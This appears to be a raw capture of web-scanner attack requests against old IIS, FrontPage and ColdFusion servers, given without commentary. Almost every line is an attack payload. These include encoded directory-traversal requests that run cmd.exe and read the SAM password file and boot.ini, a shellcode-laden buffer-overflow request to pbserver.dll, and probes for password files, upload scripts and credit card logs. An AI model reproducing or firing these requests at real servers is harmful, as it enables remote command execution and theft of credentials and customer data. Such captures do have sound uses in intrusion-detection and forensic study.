HTTP/1.1

-HEAD /Cgi-Bin/hello.bat HTTP/1.1

-HEAD /bdir.htr HTTP/1.1

-HEAD /autoexec.bat HTTP/1.1

-HEAD
/ASPSamp/AdvWorks/equipment/catalog_type.asp HTTP/1.1

-HEAD /app.cfm HTTP/1.1

-HEAD
/AdvWorks/equipment/catalog_type.asp HTTP/1.1

-HEAD /adsamples/config/site.csc
HTTP/1.1

-HEAD /admisapi/fpadmin.htm HTTP/1.1

-HEAD /Admin_files/order.log HTTP/1.1

-HEAD /abczxv.htw HTTP/1.1

-HEAD
/a.asp/..\../..\../winnt/repair/sam HTTP/1.1

-HEAD /_vti_pvt/users.pwd HTTP/1.1

-HEAD /_vti_pvt/shtml.exe HTTP/1.1

-HEAD /_vti_pvt/shtml.dll HTTP/1.1

-HEAD /_vti_pvt/service.pwd HTTP/1.1

-HEAD /_vti_pvt/service.grp HTTP/1.1

-HEAD /_vti_pvt/doctodep.btr HTTP/1.1

-HEAD /_vti_pvt/authors.pwd HTTP/1.1

-HEAD /_vti_pvt/author.log HTTP/1.1

-HEAD /_vti_pvt/administrators.pwd
HTTP/1.1

-HEAD /_vti_pvt/administrator.pwd
HTTP/1.1

-HEAD /_vti_pvt/ HTTP/1.1

-HEAD /_vti_pvt HTTP/1.1

-HEAD /_vti_inf.html HTTP/1.1

-HEAD /_vti_bin/shtml.exe HTTP/1.1

-HEAD /_vti_bin/shtml.dll/_vti_rpc
HTTP/1.1

-HEAD /_vti_bin/shtml.dll HTTP/1.1

-HEAD /_vti_bin/fpexe HTTP/1.1

-HEAD /_vti_bin/fpcount.exe HTTP/1.1

-HEAD /_vti_bin/_vti_aut/dvwssr.dll
HTTP/1.1

-HEAD
/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.1

-HEAD /_private/registrations.txt
HTTP/1.1

-HEAD /_private/register.txt HTTP/1.1

-HEAD /_private/orders.txt HTTP/1.1

-HEAD /_private/form_results.txt
HTTP/1.1

-HEAD /_private HTTP/1.1

-HEAD
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c
HTTP/1.1

-HEAD
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c
HTTP/1.1

-HEAD
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c HTTP/1.1

-HEAD
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c HTTP/1.1

-HEAD
/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.1

-OPTIONS / HTTP/1.1

-HEAD
/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.1

-HEAD /_AuthChangeUrl? HTTP/1.1

-HEAD /_AuthChangeUrl HTTP/1.1

-HEAD /?PageServices HTTP/1.1

-HEAD /../../../../config.sys HTTP/1.1

-HEAD
/../../../../../winnt/repair/sam._ HTTP/1.1

-HEAD /../../../../../../../boot.ini
HTTP/1.1

-HEAD /../../../../all HTTP/1.1

-HEAD /....../all HTTP/1.1

-HEAD /....../ HTTP/1.1

-HEAD /Global.asa HTTP/1.1

-HEAD /........../autoexec.bat HTTP/1.1

-HEAD /*.idq HTTP/1.1

-HEAD /*.idc HTTP/1.1

-HEAD /*.ida HTTP/1.1

-GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type\winnt\repair\sam
\tHTTP/1.1

-GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\*.cif/s/b
HTTP/1.1

-GET /NULL.printer HTTP/1.1

-OPTIONS * HTTP/1.0

-HEAD /_vti_bin/_vti_aut/fp30reg.dll
HTTP/1.1

-GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\*.cif/s/b+dir+d:\*.cif/s/b
HTTP/1.1

-GET / HTTP/1.1

-HEAD /qweiop43809442fsfjflr.html
HTTP/1.1

-GET /_vti_inf.html HTTP/1.1

-GET / HTTP/1.1

-POST /_vti_bin/_vti_aut/author.dll
HTTP/1.1 (application/x-www-form-urlencoded)
-HEAD
/cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e95010642/winnt/cmd.exe?/c+dir+c:\
HTTP/1.1

-HEAD /cgi-bin/perlis.dll HTTP/1.1

-HEAD
/Scripts/..%u0025u005c..u0025u005cWINNT/system32/cmd.exe?/c+dir+c:
HTTP/1.1

-HEAD /iissamples/ISSamples/SQLQHit.asp
HTTP/1.1

-HEAD /index.asp.bak HTTP/1.1

-HEAD /_vti_bin/_vti_aut/fp30reg.dll
HTTP/1.1

-HEAD
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1

-HEAD
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.1

-HEAD
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/_mem_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.1

-HEAD /\../readme.txt HTTP/1.1

-HEAD /..\..\..\..\..\..\autoexec.bat
HTTP/1.1

-HEAD /..\..\..\..\..\autoexec.bat
HTTP/1.1

-HEAD /..\..\..\..\autoexec.bat
HTTP/1.1

-HEAD /..\..\..\autoexec.bat HTTP/1.1

-HEAD /..\..\autoexec.bat HTTP/1.1

-HEAD /../../winnt/win.ini HTTP/1.1

-HEAD /..\..\..\winnt\repair\sam._
HTTP/1.1

-HEAD /../boot.ini HTTP/1.1

-HEAD /.../boot.ini HTTP/1.1

-HEAD /..../boot.ini HTTP/1.1

-HEAD /...../boot.ini HTTP/1.1

-HEAD /....../boot.ini HTTP/1.1

-HEAD /......./boot.ini HTTP/1.1

-HEAD /......../boot.ini HTTP/1.1

-HEAD /........./boot.ini HTTP/1.1

-HEAD /........../boot.ini HTTP/1.1

-HEAD /.........../boot.ini HTTP/1.1

-HEAD /............/boot.ini HTTP/1.1

-HEAD /............./boot.ini HTTP/1.1

-HEAD /............../boot.ini HTTP/1.1

-HEAD /.............../boot.ini
HTTP/1.1

-HEAD /................/boot.ini
HTTP/1.1

-HEAD /................./boot.ini
HTTP/1.1

-HEAD /................../boot.ini
HTTP/1.1

-HEAD /.................../boot.ini
HTTP/1.1

-HEAD /..................../boot.ini
HTTP/1.1

-HEAD /...................../config.sys
HTTP/1.1

-HEAD /nofile.pl HTTP/1.1

-HEAD /\../config.sys HTTP/1.1

-HEAD /\../boot.ini HTTP/1.1

-HEAD /../../boot.ini HTTP/1.1

-HEAD /../../../boot.ini HTTP/1.1

-HEAD /../../../../boot.ini HTTP/1.1

-HEAD /../../../../../boot.ini HTTP/1.1

-HEAD /../../../../../../boot.ini
HTTP/1.1

-HEAD /../../../../../../../../boot.ini
HTTP/1.1

-HEAD /sample.asp HTTP/1.1

-HEAD /cgi-bin/guestbook.cgi HTTP/1.1

-HEAD /private HTTP/1.1

-HEAD /cgi-bin/test.cgi HTTP/1.1

-HEAD
/pbserver/pbserver.dll?OSArch=0&OSType=2&LCID=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE&OSVer=%55%8B%EC%90%90%90%90%90%bb%ff%ff%ff%ff%83%eb%8b%53%68%6e%2e%74%78%68%76%6f%72%75%68%20%70%73%72%68%69%72%20%3e%68%2f%63%20%64%90%90&CMVer=%68%65%78%65%20%68%63%6d%64%2e%B8%86%a9%f1%77%8b%dc%33%f6%56%53%ff%d0%90%90DDDDDDDDDDDDDDDDDDD&PBVer=&0PB=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%4c%55%93%5e%cc%ccAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%e4%51%93%5ennnn
HTTP/1.1

-HEAD /cgi-bin/dbmlparser.exe HTTP/1.1

-HEAD
/cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.1

-HEAD /cfdocs/cfcache.map HTTP/1.1

-HEAD /cfdocs/MOLE.CFM HTTP/1.1

-HEAD /cfdocs/TOXIC.CFM HTTP/1.1

-HEAD /cfdocs/expressions.cfm HTTP/1.1

-HEAD /cfdocs/zero.cfm HTTP/1.1

-HEAD /page.cfm HTTP/1.1

-HEAD
/CFIDE/Administrator/startstop.html HTTP/1.1

-HEAD /cfdocs/snippets/ HTTP/1.1

-HEAD /cfide/Administrator/ HTTP/1.1

-HEAD /cfdocs/exampleapp/ HTTP/1.1

-HEAD /cfdocs/examples/ HTTP/1.1

-HEAD /cfappman/ HTTP/1.1

-HEAD /cfdocs/ HTTP/1.1

-HEAD /_vti_bin/_vti_aut/dvwssr.dll
HTTP/1.1

-HEAD /_vti_bin/shtml.dll/_vti_rpc
HTTP/1.1

-HEAD /..../Windows/Admin.pwl HTTP/1.1

-HEAD /cgi-win/wincgi.bat HTTP/1.1

-HEAD /scripts/../../cmd.exe HTTP/1.1

-HEAD /scripts/iisadmin/default.htm
HTTP/1.1

-HEAD /scripts/perl HTTP/1.1

-HEAD
/AdvWorks/equipment/catalog_type.asp HTTP/1.1

-HEAD /scripts/cpshost.dll HTTP/1.1

-HEAD /scripts/proxy/w3proxy.dll
HTTP/1.1

-HEAD /scripts/iisadmin HTTP/1.1

-HEAD /_vti_bin/_vti_aut HTTP/1.1

-HEAD /_vti_bin/_vti_adm HTTP/1.1

-HEAD /_vti_pvt HTTP/1.1

-HEAD /_vti_log HTTP/1.1

-HEAD /_vti_bin HTTP/1.1

-HEAD /Scripts/samples HTTP/1.1

-HEAD /iisamples/Sdk HTTP/1.1

-HEAD /iissamples/Default HTTP/1.1

-HEAD /cfide/ HTTP/1.1

-HEAD /iisadmin HTTP/1.1

-HEAD /msadc/samples/adctest.asp
HTTP/1.1

-HEAD /scripts/iisadmin/samples
HTTP/1.1

-HEAD /scripts/iisadmin/tools HTTP/1.1

-HEAD /scripts/Fpadmcgi.exe HTTP/1.1

-HEAD /Scripts HTTP/1.1

-HEAD /cgi-bin/GWWEB.EXE HTTP/1.1

-HEAD
/cfdocs/exampleapp/email/application.cfm HTTP/1.1

-HEAD /wwwboard.pl HTTP/1.1

-HEAD /wwwboard/passwd.txt HTTP/1.1

-HEAD /WebShop/logs/ck.log HTTP/1.1

-HEAD /WebShop/logs/cc.txt HTTP/1.1

-[TCP Retransmission] HEAD
/cfdocs/exampleapp/ HTTP/1.1

-HEAD /search97.vts HTTP/1.1

-HEAD /user.dat HTTP/1.1

-HEAD /user.log HTTP/1.1

-HEAD /scripts/IISADMPWD HTTP/1.1

-HEAD /cgi-bin/_vti_cnf HTTP/1.1

-HEAD /_vti_txt HTTP/1.1

-HEAD /cgi-bin/GW5 HTTP/1.1

-HEAD /cgi-bin/GW5/GWWEB.EXE HTTP/1.1

-HEAD /ssi/envout.bat HTTP/1.1

-[TCP Retransmission] HEAD
/scripts/cpshost.dll HTTP/1.1

-HEAD /scripts/uploadn.asp HTTP/1.1

-HEAD /scripts/upload.asp HTTP/1.1

-HEAD /Scripts/tools HTTP/1.1

-HEAD /iissamples/ISSamples HTTP/1.1

-HEAD /.html/............/autoexec.bat
HTTP/1.1

-HEAD /....../autoexec.bat HTTP/1.1

-HEAD /....../config.sys HTTP/1.1

-HEAD /session/adminlogin HTTP/1.1

-HEAD /scripts/tools/uploadn.asp
HTTP/1.1

-HEAD /scripts/tools/newdsn.exe
HTTP/1.1

-HEAD /iissamples/ExAir HTTP/1.1

-HEAD /.html/............*/config.sys
HTTP/1.1

-HEAD /.html/............./config.sys
HTTP/1.1

-HEAD /server-info HTTP/1.1

-HEAD /server-status HTTP/1.1

-[TCP Retransmission] HEAD /_vti_bin
HTTP/1.1

-HEAD /WebShop/templates/cc.txt
HTTP/1.1

-HEAD /ws_ftp.ini HTTP/1.1

-HEAD /cgi-bin/visitor.exe HTTP/1.1

-HEAD /secure/.wwwacl HTTP/1.1

-HEAD /scripts/tools/mkilog.exe
HTTP/1.1

-HEAD /iissamples HTTP/1.1

-HEAD /scripts/tools/getdrvs.exe
HTTP/1.1

-HEAD /search HTTP/1.1

-HEAD /scripts/wguest.exe HTTP/1.1

-HEAD /scripts/wsisa.dll HTTP/1.1

-HEAD /secure/.htaccess HTTP/1.1

-HEAD /today.nsf HTTP/1.1

-HEAD /smdata.dat HTTP/1.1

-HEAD /scripts/wa.exe HTTP/1.1

-HEAD /scripts/webbbs.exe HTTP/1.1

-HEAD /tree.dat HTTP/1.1

-HEAD /scripts/tools/getdrvrs.exe
HTTP/1.1

-HEAD /scripts/tools/uploadx.asp
HTTP/1.1

-HEAD /showfile.asp HTTP/1.1

-HEAD /scripts/visadmin.exe HTTP/1.1

-HEAD /scripts/uploadx.asp HTTP/1.1

-HEAD /scripts/tools/dsnform.exe
HTTP/1.1

-HEAD /admisapi/ HTTP/1.1

-HEAD /scripts/srchadm/webhits.exe
HTTP/1.1

-HEAD /scripts/slxweb.dll HTTP/1.1

-HEAD
/scripts/samples/search/webhits.exe HTTP/1.1

-HEAD
/scripts/samples/search/simple.idq HTTP/1.1

-HEAD
/scripts/samples/search/queryhit.idq HTTP/1.1

-HEAD /scripts/samples/search/query.idq
HTTP/1.1

-HEAD
/scripts/samples/search/qsumrhit.htw HTTP/1.1

-HEAD
/scripts/samples/search/qfullhit.htw HTTP/1.1

-HEAD
/scripts/samples/search/filetime.idq HTTP/1.1

-HEAD
/scripts/samples/search/filesize.idq HTTP/1.1

-HEAD
/scripts/samples/search/author.idq HTTP/1.1

-HEAD /scripts/samples/details.idc
HTTP/1.1

-HEAD /scripts/samples/ctguestb.idc
HTTP/1.1

-HEAD /scripts/rguest.exe HTTP/1.1

-HEAD /scripts/repost.asp HTTP/1.1

-HEAD /scripts/proxy/w3proxy.dll
HTTP/1.1

-HEAD /scripts/postinfo.asp HTTP/1.1

-HEAD /scripts/pfieffer.cmd HTTP/1.1

-HEAD /scripts/pfieffer.bat HTTP/1.1

-HEAD /scripts/perl HTTP/1.1

-HEAD /scripts/no-such-file.pl HTTP/1.1

-HEAD /scripts/lsass.exe HTTP/1.1

-HEAD /scripts/issadmin/bdir.htr
HTTP/1.1

-HEAD
/scripts/iisadmin/tools/mkilog.exe HTTP/1.1

-HEAD /_vti_adm/admin.dll HTTP/1.1

-HEAD /scripts/convert.bas HTTP/1.1

-HEAD
/scripts/iisadmin/tools/getdrvrs.exe HTTP/1.1

-HEAD /scripts/iisadmin/tools/ctss.idc
HTTP/1.1

-HEAD
/scripts/iisadmin/ism.dll?http/dir HTTP/1.1

-HEAD /scripts/iisadmin/ism.dll
HTTP/1.1

-HEAD /scripts/iisadmin/bdir.htr
HTTP/1.1

-HEAD /scripts/htimage.exe HTTP/1.1

-HEAD /scripts/fpcount.exe HTTP/1.1

-HEAD /scripts/environ.pl HTTP/1.1

-HEAD /scripts/emurl/RECMAN.dll
HTTP/1.1

-HEAD
/scripts/dbman/db.cgi?db=invalid-db HTTP/1.1

-HEAD /scripts/cpshost.dll HTTP/1.1

-HEAD /scripts/counter.exe HTTP/1.1

-HEAD /scripts/convert.bas HTTP/1.1

-HEAD /scripts/cmd32.exe?/c+dir
HTTP/1.1

-HEAD /cgi-bin/ HTTP/1.1

-HEAD /scripts/cmd32.exe HTTP/1.1

-HEAD /scripts/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD /scripts/cmd.exe HTTP/1.1

-HEAD /scripts/CGImail.exe HTTP/1.1

-HEAD
/scripts/cart32.exe/cart32clientlist HTTP/1.1

-HEAD
/scripts/c32web.exe/ChangeAdminPassword HTTP/1.1

-HEAD
/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD /scripts/../../cmd.exe HTTP/1.1

-HEAD
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
HTTP/1.1

-HEAD
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
HTTP/1.1

-HEAD
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
HTTP/1.1

-HEAD
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
HTTP/1.1

-HEAD /scripts/*.pl HTTP/1.1

-HEAD /scripts/* HTTP/1.1

-HEAD /scripts/ HTTP/1.1

-HEAD /scripts HTTP/1.1

-HEAD
/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD /_vti_bin/_vti_aut/author.dll
HTTP/1.1

-HEAD
/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD /_private HTTP/1.1

-HEAD
/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD /samples/search/queryhit.htm
HTTP/1.1

-HEAD /robots.txt HTTP/1.1

-HEAD /rightfax/fuwww.dll/ HTTP/1.1

-HEAD /password.txt HTTP/1.1

-HEAD /password.log HTTP/1.1

-HEAD /password.dat HTTP/1.1

-HEAD /password HTTP/1.1

-HEAD /passwd.txt HTTP/1.1

-HEAD /passwd HTTP/1.1

-HEAD
/msads/samples/selector/showcode.asp HTTP/1.1

-HEAD
/msads/Samples/SELECTOR/showcode.asp HTTP/1.1

-HEAD
/msadc/samples/selector/showcode.asp_2 HTTP/1.1

-HEAD /srchadm HTTP/1.1

-HEAD
/msadc/samples/selector/showcode.asp HTTP/1.1

-HEAD
/msadc/Samples/SELECTOR/showcode.asp HTTP/1.1

-HEAD
/msadc/Samples/SELECTOR/codebrws.cfm HTTP/1.1

-HEAD /msadc/samples/adctest.asp
HTTP/1.1

-HEAD /msadc/msadcs.dll HTTP/1.1

-HEAD
/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.1

-HEAD
/msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
HTTP/1.1

-HEAD
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.1

-HEAD
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.1

-HEAD
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.1

-HEAD
/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
HTTP/1.1

-HEAD
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.1

-HEAD
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.1

-HEAD /msadc HTTP/1.1

-HEAD /main.asp+.htr HTTP/1.1

-HEAD /main.asp\\ HTTP/1.1

-HEAD /main.asp::$DATA HTTP/1.1

-HEAD /main.asp. HTTP/1.1

-HEAD /main.asp%81 HTTP/1.1

-HEAD /main.asp%2e%41sp HTTP/1.1

-HEAD /main.asp%2e HTTP/1.1

-HEAD /index.asp+.htr HTTP/1.1

-HEAD /index.asp\\ HTTP/1.1

-HEAD /index.asp::$DATA HTTP/1.1

-HEAD /index.asp. HTTP/1.1

-HEAD /index.asp%81 HTTP/1.1

-HEAD /index.asp%2e%41sp HTTP/1.1

-HEAD /index.asp%2e HTTP/1.1

-HEAD /include/HEAD.html HTTP/1.1

-HEAD /include/css.css HTTP/1.1

-HEAD
/iissamples/sdk/asp/docs/codebrws.asp HTTP/1.1

-HEAD /iissamples/issamples/query.idq
HTTP/1.1

-HEAD /iissamples/issamples/query.asp
HTTP/1.1

-HEAD
/iissamples/issamples/oop/qsumrhit.htw HTTP/1.1

-HEAD
/iissamples/issamples/oop/qfullhit.htw HTTP/1.1

-HEAD /iissamples/issamples/fastq.idq
HTTP/1.1

-HEAD /iissamples/iissamples/query.asp
HTTP/1.1

-HEAD
/iissamples/exair/search/search.idq HTTP/1.1

-HEAD
/IISSAMPLES/ExAir/Search/search.asp HTTP/1.1

-HEAD
/iissamples/exair/search/query.idq HTTP/1.1

-HEAD
/iissamples/exair/search/qsumrhit.htw HTTP/1.1

-HEAD
/iissamples/exair/search/qfullhit.htw HTTP/1.1

-HEAD
/iissamples/exair/search/advsearch.asp HTTP/1.1

-HEAD
/iissamples/exair/howitworks/showcode.asp HTTP/1.1

-HEAD
/iissamples/exair/howitworks/codebrws.asp HTTP/1.1

-HEAD
/iissamples/exair/howitworks/code.asp HTTP/1.1

-HEAD /iishelp/iis/misc/iirturnh.htw
HTTP/1.1

-HEAD /iisadmpwd/anot3.htr HTTP/1.1

-HEAD /iisadmpwd/anot.htr HTTP/1.1

-HEAD /iisadmpwd/aexp4b.htr HTTP/1.1

-HEAD /iisadmpwd/aexp4.htr HTTP/1.1

-HEAD /iisadmpwd/aexp3.htr HTTP/1.1

-HEAD /iisadmpwd/aexp2b.htr HTTP/1.1

-HEAD /iisadmpwd/aexp2.htr HTTP/1.1

-HEAD /iisadmpwd/aexp.htr HTTP/1.1

-HEAD /IISADMPWD/achg.htr HTTP/1.1

-HEAD /iisadmpwd/achg.htr HTTP/1.1

-HEAD /iisadmin/ HTTP/1.1

-HEAD /hosts.dat HTTP/1.1

-HEAD /HEAD.css HTTP/1.1

-HEAD /global.asa+.htr HTTP/1.1

-HEAD
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\repair\\sam._
HTTP/1.1

-HEAD /getfile.cfm HTTP/1.1

-HEAD /doc HTTP/1.1

-HEAD /default.asp+.htr HTTP/1.1

-HEAD /default.asp\\ HTTP/1.1

-HEAD /default.asp::$DATA HTTP/1.1

-HEAD /default.asp. HTTP/1.1

-HEAD /default.asp%81 HTTP/1.1

-HEAD /default.asp%2e%41sp HTTP/1.1

-HEAD /default.asp%2e HTTP/1.1

-HEAD /config/orders.txt HTTP/1.1

-HEAD /config/mountain.cfg HTTP/1.1

-HEAD /config/import.txt HTTP/1.1

-HEAD /config/checks.txt HTTP/1.1

-HEAD /con/con HTTP/1.1

-HEAD /com4 HTTP/1.1

-HEAD /com3 HTTP/1.1

-HEAD /com2 HTTP/1.1

-HEAD /com1 HTTP/1.1

-HEAD /cmd.exe?/c+dir%20c:\ HTTP/1.1

-HEAD /cgi-win/wguest.exe HTTP/1.1

-HEAD /cgi-win/uploader.exe HTTP/1.1

-HEAD /Cgi-Win/uploader.exe HTTP/1.1

-HEAD /cgi-win/perl.exe HTTP/1.1

-HEAD /cgi-win HTTP/1.1

-HEAD /cgi-shl/win-c-sample.exe
HTTP/1.1

-HEAD /cgi-dos/args.cmd HTTP/1.1

-HEAD /cgi-dos/args.bat HTTP/1.1

-HEAD /cgi-bin/windmail.exe HTTP/1.1

-HEAD /cgi-Bin/windmail.exe HTTP/1.1

-HEAD /cgi-bin/wguest.exe HTTP/1.1

